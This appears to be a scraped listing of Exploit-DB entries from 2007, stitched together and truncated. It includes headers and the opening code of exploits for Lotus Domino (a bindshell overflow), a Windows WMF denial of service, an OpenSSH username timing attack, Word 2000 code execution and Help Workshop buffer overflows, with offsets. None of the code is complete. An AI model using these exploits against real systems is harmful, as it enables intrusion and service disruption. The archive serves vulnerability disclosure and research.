for ($i=0; $i 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(get
Exploit-DB
IBM Lotus Domino Server 6.5 - Remote Overflow
exploitdb·2007-03-31
CVE-2007-1675 IBM Lotus Domino Server 6.5 - Remote Overflow
IBM Lotus Domino Server 6.5 - Remote Overflow
---
#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0.
# Coded by Mati Aharoni
# [email protected]
# http://www.offensive-security.com
# Notes:
# * Not the the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMD
Exploit-DB
Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service
exploitdb·2007-02-25
CVE-2007-1090 Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service
Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service
---
source: https://www.securityfocus.com/bid/22715/info
Microsoft Windows Explorer is prone to a denial-of-service vulnerability.
A remote attacker may exploit this vulnerability by presenting a malicious file to a victim user. Users do not have to open the file -- simply browsing a folder containing the malicious file is sufficient to trigger this issue.
A successful exploit will crash the vulnerable application, effectively denying service.
This issue may be related to BID 19365 (Microsoft Windows GDI32.DLL WMF Remote Denial of Service Vulnerability) or BID 21992 (Microsoft Windows Explorer WMF File Denial of Service Vulnerability).
#!/usr/bin/perl
print "\nWMF PoC denial of service exploit by AzM";
prin
Exploit-DB
Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
exploitdb·2007-02-22
CVE-2007-0843 Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
---
// source: https://www.securityfocus.com/bid/22664/info
Microsoft Windows is prone to a local information-disclosure vulnerability.
A local attacker may leverage this issue to gain access to potentially sensitive information about user permissions and accessed files. Information gained may aid in further attacks against the affected computer.
/*
Monitors directory changes
(c) 2006-2007 Vladimir Dubrovin, 3APA3A
http://securityvulns.com/
http://securityvulns.ru/
*/
#include
#include
#include
int main(int argc, char *argv[]){
HANDLE hDir;
char buf[1024];
FILE_NOTIFY_INFORMATION * fn;
int read;
WCHAR * action = NULL;
if(argc != 2) {
printf(
"Usage: %s \n"
" Monitor directory changes with all subdirectories\
Exploit-DB
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
exploitdb·2007-02-13·CVSS 5.0
CVE-2006-5229 [MEDIUM] Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
Portable OpenSSH 3.6.1p-PAM/4.1-SuSE - Timing Attack
---
#!/bin/bash
#
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
#
# raptor_sshtime - [Open]SSH remote timing attack exploit
# Copyright (c) 2006 Marco Ivaldi
#
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
# sends an error message when a user does not exist, which allows remote
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
#
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
# and possibly under limited configurations, allows remote attackers to
# determine valid usernames via timing discrepancies in which responses take
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
# NOTE: as of 20061014, it appears
Exploit-DB
Microsoft Word 2000 - Code Execution
exploitdb·2007-02-03
CVE-2007-0515 Microsoft Word 2000 - Code Execution
Microsoft Word 2000 - Code Execution
---
############ use at your own risk *******
+ Title: Microsoft Word 2000 Unspecified Code Execution Vulnerability Exploit (0-day)
+ code by xCuter (BongGoo Kang - [email protected])
+ Critical: High Critical
+ Impact: MS Word 2000 -> Could Allow Arbitrary Command Execution
MS word 2003 -> Attempts against Word 2003/XP will consume all CPU resources and will cause a denial of service
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
+ Tested Software: Microsoft(R) Word 2000 (9.0.2720)
+ Solution: Not Patched (zero-day)
+ Description:
When a user opens a specially crafted Word file using a malformed string,
it may corrupt system memory in such a way that an attacker could execute arbitrary code
Exploit-DB
Microsoft Word 2000 - Malformed Function Code Execution
exploitdb·2007-01-25
CVE-2007-0515 Microsoft Word 2000 - Malformed Function Code Execution
Microsoft Word 2000 - Malformed Function Code Execution
---
source: https://www.securityfocus.com/bid/22225/info
Microsoft Word 2000 is prone to a remote code-execution vulnerability.
Microsoft Word 2000 is confirmed vulnerable to a remote code-execution issue. Exploit attempts against Word 2003/XP will consume all CPU resources and will cause a denial of service for legitimate users.
Note that this issue is distinct from issues described in BID 21589 (Microsoft Word Code Execution Vulnerability), BID 21451 (Microsoft Word Malformed String Remote Code Execution Vulnerability), and BID 21518 (Microsoft Word Malformed Data Structures Code Execution Vulnerability).
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29524.doc
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
exploitdb·2007-01-19
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
Microsoft Help Workshop 4.03.0002 - '.HPJ' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .HPJ project files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0 and 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "Microsoft Help Workshop PoC exploit by porkythepig"
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 671
#define PROC_NAM_SIZ 128
#define RET_OFFSET 0x14e
#define PROC_NAME_OFFSET 0x166
#define EXPRO_OFFSET 0xd9
#define GETSTAR_OFFSET 0x58
#define CREPRO_OFFSET 0xcf
#define GETWINDIR_OFFSET 0x73
typedef struct
{
unsigned int extPro;
Exploit-DB
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
exploitdb·2007-01-17
CVE-2007-0427 Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
Microsoft Help Workshop 4.03.0002 - '.cnt' Local Buffer Overflow
---
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
typedef struct
{
2007-04-12
Published